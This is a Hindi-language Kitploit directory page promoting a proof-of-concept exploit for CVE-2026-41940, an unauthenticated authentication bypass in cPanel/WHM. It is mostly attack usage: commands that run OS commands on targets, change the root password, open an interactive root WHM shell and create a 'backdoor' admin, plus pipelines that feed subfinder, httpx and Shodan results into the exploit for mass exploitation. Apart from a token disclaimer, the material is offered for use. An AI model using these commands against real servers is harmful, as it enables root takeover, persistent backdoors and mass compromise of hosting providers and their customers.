Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-41940-PoC — CVE-2026-41940 के लिए एक्सप्लॉइट, cPanel/WHM में एक बिना प्रमाणीकरण वाला प्रमाणीकरण बायपास, जो CRLF सेशन इंजेक्शन के माध्यम से रूट-स्तरीय WHM एक्सेस प्रदान करता है, साथ ही पोस्ट-एक्सप्लॉइटेशन कमांड और इंटरैक्टिव शेल के साथ। | Kitploit
उपकरण/GitHubGitHub/pemarine/cve-2026-41940-poc
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubpemarine/cve-2026-41940-poc

cve-2026-41940-PoC

CVE-2026-41940 के लिए एक्सप्लॉइट, cPanel/WHM में एक बिना प्रमाणीकरण वाला प्रमाणीकरण बायपास, जो CRLF सेशन इंजेक्शन के माध्यम से रूट-स्तरीय WHM एक्सेस प्रदान करता है, साथ ही पोस्ट-एक्सप्लॉइटेशन कमांड और इंटरैक्टिव शेल के साथ।

रिपॉजिटरी देखें
270127 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940

⚠ यह उपकरण केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।

विवरण

CVE-2026-41940 का शोषण करने के लिए एक उपकरण, जो cPanel और WHM में एक गंभीर प्रमाणीकरण बाईपास (CVSS 10.0) है, जो बिना प्रमाणीकरण वाले हमलावरों को Authorization हेडर के माध्यम से सर्वर-साइड सत्र फ़ाइलों में CRLF अनुक्रम इंजेक्ट करके रूट-स्तरीय WHM पहुंच प्राप्त करने की अनुमति देता है — कोई क्रेडेंशियल आवश्यक नहीं।

यह कैसे काम करता है

CVE-2026-41940, सामान्य शब्दों में, cPanel/WHM में प्रमाणीकरण सत्रों को संभालने के तरीके में खराबी के माध्यम से शोषित किया जाता है। हमला आम तौर पर लॉगिन इंटरफ़ेस पर एक सामान्य अनुरोध के साथ शुरू होता है, जहां एप्लिकेशन उपयोगकर्ता क्रेडेंशियल्स को पूरी तरह से सत्यापित करने से पहले एक सत्र को समय से पहले आरंभ करता है। सत्र-संबंधी इनपुट के अनुचित प्रबंधन के कारण, कुछ विशेष रूप से तैयार या अप्रत्याशित इनपुट संरचनाएं बदल सकती हैं कि सर्वर द्वारा सत्र डेटा को कैसे संग्रहीत या व्याख्या किया जाता है।

प्रभावित संस्करण

संस्करणअसुरक्षितपैच किया गया
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

स्थापना(Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/pemarine/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

उपयोग कैसे करें

उपकरण एक लक्ष्य डोमेन निर्दिष्ट करने की अपेक्षा करता है।

एकल लक्ष्य मोड:

root@kitploit:~
python cve.py -u https://target1.com:2083

आप target.txt फ़ाइल से भी स्कैन कर सकते हैं (इसे बनाएं):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

बुनियादी स्कैन:

उपलब्ध कमांड:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

शोषण के बाद की क्रियाएँ

root@kitploit:~
# List all accounts on the server
python cve.py list -u https://target.com:2087

# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087

# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python cve.py shell -u https://target.com:2087

पाइपलाइन

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM शेल मोड

सफल निष्पादन के बाद, आप एक इंटरैक्टिव WHM शेल खोल सकते हैं:

root@kitploit:~
python cve.py shell -u

सभी शेल कमांड


CLI संदर्भ

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

अस्वीकरण

⚠ यह उपकरण केवल शैक्षिक या बग बाउंटी उद्देश्य के लिए बनाया गया है। नियंत्रित वातावरण के बाहर अनधिकृत उपयोग सख्त वर्जित है।

टूल डाउनलोड करें
कमांडविवरण
idउपयोगकर्ता आईडी दिखाएं
hostnameसर्वर का होस्टनाम प्राप्त करें
accountsसभी उपयोगकर्ता खातों की सूची बनाएं
infoलोड, डिस्क, MySQL होस्ट, संस्करण
cat <path>फ़ाइल सामग्री पढ़ें
exec <cmd>OS कमांड निष्पादित करें
newadmin <user> <pass>बैकडोर WHM व्यवस्थापक बनाएं
passwd <pass>रूट पासवर्ड बदलें
l [path]निर्देशिका सूचीबद्ध करें
helpसभी कमांड दिखाएं
exitशेल मोड से बाहर निकलें